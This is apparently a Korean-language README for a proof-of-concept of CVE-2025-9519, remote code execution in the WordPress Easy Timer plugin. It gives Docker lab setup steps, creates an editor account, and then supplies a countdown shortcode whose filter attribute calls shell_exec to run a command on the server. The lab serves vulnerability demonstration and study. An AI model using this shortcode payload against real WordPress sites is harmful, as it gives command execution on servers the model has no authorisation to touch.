
CVE-2025-9519에 대한 개념 증명 익스플로잇으로, 조작된 숏코드 필터를 통해 WordPress Easy Timer 플러그인에서 원격 코드 실행을 시연하며, Docker 기반 설정을 포함합니다.
공식 Docker 문서를 참조하여 설치하세요: Docker Engine 설치
프로젝트 디렉터리에서:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/로 이동합니다.WordPress 대시보드 → 플러그인 → Easy Timer로 이동하여 를 클릭합니다.
활성화
프로젝트 디렉터리에서 다음 명령을 실행합니다:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(참고: 사용자 이름, 이메일 및 비밀번호는 원하는 값으로 변경하세요!)
게시물 → 새로 추가로 이동합니다.숏코드 블록을 삽입하고 다음을 입력합니다:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ 참고: 숏코드가 제대로 렌더링되도록 단락 블록이 아닌 숏코드 블록을 사용하고 있는지 확인하세요.

축하합니다. RCE에 성공했습니다.

sudo docker ps
다음과 같은 화면이 보여야 합니다:

숏코드가 렌더링되지 않는 경우:
http://localhost:8000/에 접속했을 때 데이터베이스 연결 안 됨 메시지가 표시되는 경우: